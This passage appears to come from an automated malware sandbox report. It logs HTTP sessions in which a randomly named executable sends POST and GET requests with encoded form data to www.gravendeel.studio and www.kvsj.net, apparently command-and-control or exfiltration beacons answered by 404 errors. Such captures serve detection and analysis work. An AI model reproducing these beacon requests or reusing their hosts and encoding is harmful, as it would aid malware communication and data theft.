                                                                                                                            Data Ascii: be oIs#\o!ww6H&lJM"M>K~f,\LPVXC8Q`=,qn&y'm]=d^Fv}A<g?qs'hDiC@MYBmG5Vnt"<eu71\c0XV6+pCp0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            34192.168.2.650048172.104.18.233805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:57.284466982 CET842OUTPOST /7hhj/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.gravendeel.studio
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.gravendeel.studio
                                                                                                                            Referer: http://www.gravendeel.studio/7hhj/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 51 32 71 45 73 66 54 54 32 37 6e 42 45 76 52 6e 62 73 72 53 66 36 39 4f 65 31 63 71 44 37 61 6a 4e 2b 72 2b 41 59 67 73 6a 45 56 4a 72 73 78 48 59 4f 78 71 4a 56 4f 6c 72 2b 62 41 67 48 4d 67 62 48 42 39 63 70 72 62 61 48 32 54 43 53 78 4b 30 38 32 43 59 4f 73 46 77 43 68 49 57 52 50 6c 35 33 37 44 34 74 4a 46 4c 55 41 38 79 59 55 57 31 67 6c 46 53 57 2b 55 2b 39 67 77 6c 43 66 71 72 2b 41 33 61 61 62 6e 72 43 47 71 6a 32 57 44 32 39 63 6f 31 52 46 64 43 75 62 36 52 67 42 69 64 31 79 53 73 62 42 76 74 59 71 58 2b 79 74 5a 52 74 6a 63 67 7a 6b 41 72 4c 50 6f 58 6d 6d 32 6c 56 44 75 74 45 48 67 4b 4d 49 39 61 48 76 6e 79 63 4f 41 47 72 48 4e 65 44 78 44 61 46 53 37 74 51 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=Q2qEsfTT27nBEvRnbsrSf69Oe1cqD7ajN+r+AYgsjEVJrsxHYOxqJVOlr+bAgHMgbHB9cprbaH2TCSxK082CYOsFwChIWRPl537D4tJFLUA8yYUW1glFSW+U+9gwlCfqr+A3aabnrCGqj2WD29co1RFdCub6RgBid1ySsbBvtYqX+ytZRtjcgzkArLPoXmm2lVDutEHgKMI9aHvnycOAGrHNeDxDaFS7tQ==
                                                                                                                            Dec 3, 2024 14:40:58.365456104 CET416INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:58 GMT
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: br
                                                                                                                            Data Raw: 62 65 0d 0a a1 d0 09 00 20 06 ad ab 6f 49 73 1d 8c 90 23 de 5c 6f 21 77 77 36 48 26 d1 6c 4a f0 f2 bd 09 4d 88 22 4d a6 a7 3e 17 0c eb b2 4b 9a 7e 14 ca c9 ed 66 2c 5c 14 4c 50 b4 56 12 da 58 d4 d8 43 b7 f1 38 51 86 60 3d 8b 2c cf 71 6e 26 79 b0 bf ce 27 6d 5d 04 f3 3d 64 5e 46 76 7d 41 c3 3c a3 16 13 c8 19 67 85 3f 71 dd 09 9a df 73 27 68 44 b9 69 8d ae 43 40 4d 59 af b0 d5 42 be d3 13 97 eb 0b 6d 47 fc f5 01 ed 35 56 e1 6e a1 0c 74 d7 d3 9f c6 84 22 3c e9 1d 92 e5 f5 65 b0 75 bd c2 b3 b1 37 31 e2 fd 5c 63 ba c0 0d 30 58 56 36 8d 2b ae ff 11 ab c3 a3 05 ca de a4 70 43 70 04 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: be oIs#\o!ww6H&lJM"M>K~f,\LPVXC8Q`=,qn&y'm]=d^Fv}A<g?qs'hDiC@MYBmG5Vnt"<eu71\c0XV6+pCp0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            35192.168.2.650049172.104.18.233805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:00.045715094 CET1855OUTPOST /7hhj/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.gravendeel.studio
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.gravendeel.studio
                                                                                                                            Referer: http://www.gravendeel.studio/7hhj/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 51 32 71 45 73 66 54 54 32 37 6e 42 45 76 52 6e 62 73 72 53 66 36 39 4f 65 31 63 71 44 37 61 6a 4e 2b 72 2b 41 59 67 73 6a 45 64 4a 73 66 4a 48 59 70 74 71 49 56 4f 6c 31 4f 62 44 67 48 4d 48 62 48 5a 48 63 70 33 4c 61 45 4f 54 44 7a 52 4b 6a 5a 61 43 4c 75 73 46 38 69 68 56 62 78 50 77 35 33 72 59 34 74 5a 46 4c 55 41 38 79 61 38 57 69 6a 39 46 51 57 2b 58 70 4e 67 56 7a 79 66 52 72 2b 59 4e 61 61 66 64 72 79 6d 71 6b 57 47 44 30 50 30 6f 76 52 46 6c 44 75 61 2f 52 67 64 39 64 78 71 65 73 5a 68 56 74 59 65 58 76 53 68 47 55 35 76 38 36 69 34 46 72 36 75 50 63 78 75 43 39 48 36 51 6b 6d 62 58 55 63 59 4d 65 69 57 78 36 38 37 50 4b 61 72 54 59 47 38 31 54 52 53 77 30 30 6c 6e 70 6b 62 36 52 58 49 44 50 45 6b 63 6e 6a 6a 31 78 6b 45 59 6e 2b 4b 59 78 4d 70 2b 35 66 4b 41 2b 74 75 35 6e 4c 35 67 53 55 37 4e 57 63 50 69 31 76 72 52 79 33 53 75 39 66 2f 73 38 41 54 61 55 6c 55 63 4e 73 68 2b 5a 36 4e 53 58 38 69 72 66 57 73 41 34 4d 4c 62 78 68 43 78 58 41 46 43 47 36 6e 2b 72 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=Q2qEsfTT27nBEvRnbsrSf69Oe1cqD7ajN+r+AYgsjEdJsfJHYptqIVOl1ObDgHMHbHZHcp3LaEOTDzRKjZaCLusF8ihVbxPw53rY4tZFLUA8ya8Wij9FQW+XpNgVzyfRr+YNaafdrymqkWGD0P0ovRFlDua/Rgd9dxqesZhVtYeXvShGU5v86i4Fr6uPcxuC9H6QkmbXUcYMeiWx687PKarTYG81TRSw00lnpkb6RXIDPEkcnjj1xkEYn+KYxMp+5fKA+tu5nL5gSU7NWcPi1vrRy3Su9f/s8ATaUlUcNsh+Z6NSX8irfWsA4MLbxhCxXAFCG6n+r1sVgaX4F5NAXLIjdWShS8tKDLB0JbrxP/XOcTFxrMVYHQG1wF6Eocrf4hfT0fWuGESrmdl4hm5ZjXmHKz872oGxOBWnNveJ60hEVCL/HHfiIgSArPyX3NJRRvLuFSpSDzEy61twk7fF8l6Sh+taN8RUDfy8UFhrs879zrAE2oPtqllEN1q0eIObDAKmSDFzQx12jNZzRhqgttnybFQRFbjOy5eThWuPq3ye2LWv9mDW0UKHFquOqVIWG5/m3/1MqTAA2qRze3bvHvbUsqKb22RH3Wb4FCKo7LUf5ex0acCWgqvZpecc1WYuvbNk6qX+3s9HGkUandSGMjwAM81n3b09ffKY33OK7abSdFIMkcZTqVrFh4h6L5IEiuXcNtsaDySjTQd/FO/KlZteXbftIcA7U5PIg/feHgFrCR/PRTMMxp+nKfu8dFtB7f2GzliX5WYtd3ylKcHhUwoaIN8PeLjg489jbzd5Q6D8cplfvEciMRRJidK3MULQUmKYolMDaOjfTUl6jl6YUf4CZ6atfcO3VpCIcLv3udUOc/tcWfvpd+TJjdaC3d3oXcS7ooVF3I6UGF+aeUy7+2C6w8xUrLLMAdlOkx4cMgnNWJyBEqmCar+840/oRSvcppW+o0+5xG3qoLvXqZ0cIySchtm6+IUEHs722JpjUA6 [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:41:01.169348955 CET416INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:01 GMT
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: br
                                                                                                                            Data Raw: 62 65 0d 0a a1 d0 09 00 20 06 ad ab 6f 49 73 1d 8c 90 23 de 5c 6f 21 77 77 36 48 26 d1 6c 4a f0 f2 bd 09 4d 88 22 4d a6 a7 3e 17 0c eb b2 4b 9a 7e 14 ca c9 ed 66 2c 5c 14 4c 50 b4 56 12 da 58 d4 d8 43 b7 f1 38 51 86 60 3d 8b 2c cf 71 6e 26 79 b0 bf ce 27 6d 5d 04 f3 3d 64 5e 46 76 7d 41 c3 3c a3 16 13 c8 19 67 85 3f 71 dd 09 9a df 73 27 68 44 b9 69 8d ae 43 40 4d 59 af b0 d5 42 be d3 13 97 eb 0b 6d 47 fc f5 01 ed 35 56 e1 6e a1 0c 74 d7 d3 9f c6 84 22 3c e9 1d 92 e5 f5 65 b0 75 bd c2 b3 b1 37 31 e2 fd 5c 63 ba c0 0d 30 58 56 36 8d 2b ae ff 11 ab c3 a3 05 ca de a4 70 43 70 04 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: be oIs#\o!ww6H&lJM"M>K~f,\LPVXC8Q`=,qn&y'm]=d^Fv}A<g?qs'hDiC@MYBmG5Vnt"<eu71\c0XV6+pCp0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            36192.168.2.650050172.104.18.233805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:02.758177042 CET557OUTGET /7hhj/?u6nP_F48=d0CkvoX3wOjxIpsVGuv5CbpRWXdSS5jyTLOcAowQzGd7pP90T+NzeFPfjsupmGVcOHZBRLveV16iOhBmsp+LB4tn4np0Uy/CwiS3uOlrNEAyxbwQ0Bx5UgKfq4kfjh/tx9U3UfI=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.gravendeel.studio
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:41:03.844734907 CET501INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:03 GMT
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            37192.168.2.650052173.236.199.97805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:09.982424974 CET791OUTPOST /z5bv/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.kvsj.net
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.kvsj.net
                                                                                                                            Referer: http://www.kvsj.net/z5bv/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 52 74 43 43 35 74 4c 4a 2b 53 31 5a 44 69 37 4e 36 71 7a 37 6e 77 6e 49 74 6b 4b 64 75 51 53 43 6b 32 41 4b 78 42 44 64 78 5a 4a 5a 32 78 36 75 77 4a 2b 46 46 74 33 76 65 74 2b 35 73 35 4d 32 64 4a 57 69 7a 4e 4a 6a 45 59 57 6b 55 63 39 55 43 5a 73 71 30 49 39 2f 36 77 78 38 36 6d 36 68 4d 5a 4b 51 75 6b 67 76 51 52 68 4a 5a 78 37 6e 63 39 36 61 63 51 49 34 62 68 48 55 55 38 4a 38 67 69 75 67 52 61 64 32 39 2b 79 55 43 77 55 53 65 73 6f 42 37 66 4e 78 51 57 78 50 7a 58 34 5a 62 75 65 6f 59 54 4f 58 75 4c 4f 58 74 54 66 66 7a 78 67 63 4e 4d 67 47 76 42 4f 4e 6e 6b 67 52 46 4f 75 66 79 2b 66 36 52 59 45 4f
                                                                                                                            Data Ascii: u6nP_F48=RtCC5tLJ+S1ZDi7N6qz7nwnItkKduQSCk2AKxBDdxZJZ2x6uwJ+FFt3vet+5s5M2dJWizNJjEYWkUc9UCZsq0I9/6wx86m6hMZKQukgvQRhJZx7nc96acQI4bhHUU8J8giugRad29+yUCwUSesoB7fNxQWxPzX4ZbueoYTOXuLOXtTffzxgcNMgGvBONnkgRFOufy+f6RYEO
                                                                                                                            Dec 3, 2024 14:41:11.114233971 CET479INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:10 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            38192.168.2.650053173.236.199.97805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:12.654444933 CET815OUTPOST /z5bv/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.kvsj.net
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.kvsj.net
                                                                                                                            Referer: http://www.kvsj.net/z5bv/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 52 74 43 43 35 74 4c 4a 2b 53 31 5a 41 43 72 4e 34 4a 62 37 67 51 6e 4a 70 55 4b 64 67 41 53 4f 6b 32 63 4b 78 45 37 4e 79 72 64 5a 32 54 53 75 78 49 2b 46 43 74 33 76 52 4e 2b 32 78 4a 4d 68 64 4a 4b 45 7a 4a 4a 6a 45 62 71 6b 55 59 74 55 46 75 41 74 31 59 39 39 76 67 78 2b 2b 6d 36 68 4d 5a 4b 51 75 6b 30 56 51 51 4a 4a 5a 43 7a 6e 64 5a 4f 64 52 77 49 37 63 68 48 55 44 4d 4a 34 67 69 75 57 52 59 70 4d 39 38 4b 55 43 79 4d 53 65 39 6f 47 30 66 4e 37 55 57 77 38 33 58 56 33 64 38 58 58 59 69 32 75 30 70 71 56 68 46 43 46 76 43 67 2f 66 63 41 45 76 44 57 2f 6e 45 67 37 48 4f 57 66 67 70 54 64 65 73 68 74 4f 4a 54 4a 65 72 57 62 33 6c 70 64 58 79 50 6c 54 4d 6b 35 73 41 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=RtCC5tLJ+S1ZACrN4Jb7gQnJpUKdgASOk2cKxE7NyrdZ2TSuxI+FCt3vRN+2xJMhdJKEzJJjEbqkUYtUFuAt1Y99vgx++m6hMZKQuk0VQQJJZCzndZOdRwI7chHUDMJ4giuWRYpM98KUCyMSe9oG0fN7UWw83XV3d8XXYi2u0pqVhFCFvCg/fcAEvDW/nEg7HOWfgpTdeshtOJTJerWb3lpdXyPlTMk5sA==
                                                                                                                            Dec 3, 2024 14:41:13.841635942 CET479INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:13 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            39192.168.2.650054173.236.199.97805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:15.328624010 CET1828OUTPOST /z5bv/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.kvsj.net
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.kvsj.net
                                                                                                                            Referer: http://www.kvsj.net/z5bv/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 52 74 43 43 35 74 4c 4a 2b 53 31 5a 41 43 72 4e 34 4a 62 37 67 51 6e 4a 70 55 4b 64 67 41 53 4f 6b 32 63 4b 78 45 37 4e 79 71 6c 5a 32 43 79 75 77 72 47 46 44 74 33 76 59 74 2b 69 78 4a 4d 38 64 4a 43 41 7a 49 31 73 45 65 6d 6b 53 36 6c 55 45 61 55 74 38 59 39 39 77 51 78 37 36 6d 36 77 4d 5a 62 58 75 6b 6b 56 51 51 4a 4a 5a 45 58 6e 62 4e 36 64 58 77 49 34 62 68 48 51 55 38 4a 51 67 69 32 47 52 59 39 63 39 4e 71 55 43 52 30 53 62 50 77 47 39 66 4e 39 54 57 77 6b 33 58 5a 30 64 34 4f 73 59 69 53 45 30 71 32 56 6b 54 66 62 71 42 55 72 46 4e 34 6c 75 55 6d 59 2f 77 38 35 46 4f 75 41 77 49 57 74 66 64 35 59 41 4a 48 58 58 6f 71 66 31 6e 56 47 63 58 57 4e 54 50 64 51 77 6f 64 42 6d 42 44 79 59 52 35 37 6a 6e 6a 62 51 50 36 62 72 31 45 62 45 45 61 33 4f 57 66 30 62 7a 79 65 6e 41 78 6a 31 45 72 71 74 6e 4f 33 4a 34 74 32 39 79 34 2f 78 56 30 4a 61 74 32 64 71 33 46 79 44 74 72 75 53 50 32 67 4b 64 35 75 69 51 70 39 56 4b 75 58 61 37 6d 79 6e 72 4d 55 5a 42 6d 49 37 45 51 65 54 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=RtCC5tLJ+S1ZACrN4Jb7gQnJpUKdgASOk2cKxE7NyqlZ2CyuwrGFDt3vYt+ixJM8dJCAzI1sEemkS6lUEaUt8Y99wQx76m6wMZbXukkVQQJJZEXnbN6dXwI4bhHQU8JQgi2GRY9c9NqUCR0SbPwG9fN9TWwk3XZ0d4OsYiSE0q2VkTfbqBUrFN4luUmY/w85FOuAwIWtfd5YAJHXXoqf1nVGcXWNTPdQwodBmBDyYR57jnjbQP6br1EbEEa3OWf0bzyenAxj1ErqtnO3J4t29y4/xV0Jat2dq3FyDtruSP2gKd5uiQp9VKuXa7mynrMUZBmI7EQeTKqDrCBHA7z04jz6jbgnfDH0JDsfLAHFnDAoEn5uieqvyQCl8zbXcOGEdhqV13BqMRqEZOqXwe7zEWmH767Y1KGQV5LW763f4yeb8Qnn0Vcm4SbeuCYpv4A4P9hHxwgtwFzHZbz/QhRIin+pC4o4oD7Pssi30/YFS0j+zK/iM1GR1XdaZsjsFcqJeHMMlQ4r+E92bQ/KQK3rQGxuNhu76kgS//zR1A60MyG5jCkQQInVP7w6iE7/CzpWrgx+nIcbYZxZYGRYFTpfYD9e8wAQBAnmfigspfha1f93y4X3DTwSrrgNdveMOdsXwwlbbRf1caXIoi1F4HfpIaBmh7ZlNPjx5alcYvKaqSRV5ZJVDTB7xImOEJ4mHn/uEoJ9TSqndulVS9epxkNNWRTaalR/WDhN/gfZF7ZhM1dM3ZnTDwwAkHKWKdme4dZZdleF0Gq+x3F3vHRDknXSuhBKyfAhEZejCvLK57oyewNezXBAuTyxpDcAveY7WOxOrcA2YAq0Hee0O16AG9HFfx4iVCNDf9lQKO1R5ovfv1XAPkJyFETnJYRzjpFAoKoEnInNTqbrl9wDiLDLzlPJacLMJTU43s6sOaf2RR0tCCZQqm2pSpEuQJyt4pY2P4zN9a+5YLkSNNPI2USa9wlwqhT9h6oYYdO26raqvFgcWhI [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:41:16.415549994 CET479INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:16 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
